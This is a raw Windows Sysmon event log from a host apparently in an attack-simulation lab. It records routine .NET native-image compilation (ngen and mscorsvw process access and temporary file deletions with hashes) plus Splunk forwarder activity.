21:07:09.576{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A705-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.542{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A705-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.542{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A705-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.542{4DB9351A-A27D-60D3-A605-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8D8OZBAOS3\napinit.ni.dll.auxMD5=C557F8149C9A06303C9BBE65F24AEFE0,SHA256=41C7DC4DD9707C9D6BFDB73C1F7F92C28DA51B0BD493BB6D0B00C0DC61BB0F1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.542{4DB9351A-A27D-60D3-A605-00000000CF01}7092NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8D8OZBAOS3\napinit.ni.dllMD5=175B75F2F8A695D803E8BF603B51796A,SHA256=DCAA8A9D9C8A68CCF57FDA02A2CE5EA539D326014801E85CCF45BE770DDC9D52,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.527{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A605-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.496{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A605-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.496{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A605-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.496{4DB9351A-A27D-60D3-A505-00000000CF01}6340NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FHZTR04TH1\napcrypt.ni.dll.auxMD5=E8D75F5590AE7C163A2740DF4DC1E76D,SHA256=7B6989BED263AF1D9310510C60E4287BB2941035AEAE1343628845173B9FEDF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.496{4DB9351A-A27D-60D3-A505-00000000CF01}6340NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\FHZTR04TH1\napcrypt.ni.dllMD5=C8731BE3381CC7F25BA891FECEABB9BC,SHA256=730E34EF4C4ADD843B421910F9A02F993104C806BC3523712C1D9BA23973126C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.480{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A505-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.464{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A505-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.464{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A505-00000000CF01}6340C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.464{4DB9351A-A27D-60D3-A405-00000000CF01}4728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GZM0XFACYU\MSBuild.ni.exe.auxMD5=BA1400669CEF6B433D9DD7AF714B1C53,SHA256=C7F42121F9BD2CCA47CB3F0809799E543F6C11DFF5D283083BCF95B16A1D0569,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.464{4DB9351A-A27D-60D3-A405-00000000CF01}4728NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GZM0XFACYU\MSBuild.ni.exeMD5=5530D103C7E92F113894F9FD371D5784,SHA256=1EF77957C7E417D35B0AF56C3479F80FA1B63EDA67628461D4A0DF4B261E3AA3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.449{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=40678848538B2515CEEA1623A7B17387,SHA256=A33BBB5E996E78D4B63052A7B627509A7695AC8FC692E4064D8CF5D5A91ECC5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.402{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A405-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.386{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A405-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023348Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.386{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A405-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023347Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.386{4DB9351A-A27D-60D3-A305-00000000CF01}3288NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Y6CMZYNKMG\MMCFxCommon.ni.dll.auxMD5=E11A35EC3E0029AE49E5369FB485F117,SHA256=64BEE29B500AEF178E0EFF88364AF77FDF303AC2C09A6AED53947DB0E6CBD3CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023346Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.371{4DB9351A-A27D-60D3-A305-00000000CF01}3288NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\Y6CMZYNKMG\MMCFxCommon.ni.dllMD5=2E4B4B450065CF19738D76E46947B6B3,SHA256=96A43B6EA5F0FFDC312F1622711D79B5D4D37DBC3436F1DF1D663BF38DFEC2DF,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023345Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.355{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A305-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023344Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A305-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023343Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A305-00000000CF01}3288C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023342Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-A27D-60D3-A205-00000000CF01}6672NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YVBD3XS902\MMCEx.ni.dll.auxMD5=B42575F46BB80EA12B6C0051E853527D,SHA256=412DD5110E20B7A0C24082A52D6D7718703D42E8BC72694B1FD3021C24D53191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023341Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.339{4DB9351A-A27D-60D3-A205-00000000CF01}6672NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YVBD3XS902\MMCEx.ni.dllMD5=D791639E4F30D6EBDFB1E69926AE0197,SHA256=072318EE5BED3B494A3B9D6BCCA7B780B2EA770E52F6A91F1618389D745FEFB6,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023340Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.230{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27D-60D3-A205-00000000CF01}6672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023339Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27D-60D3-A205-00000000CF01}6672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023338Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27D-60D3-A205-00000000CF01}6672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:09.214{4DB9351A-A27C-60D3-A105-00000000CF01}6528NT 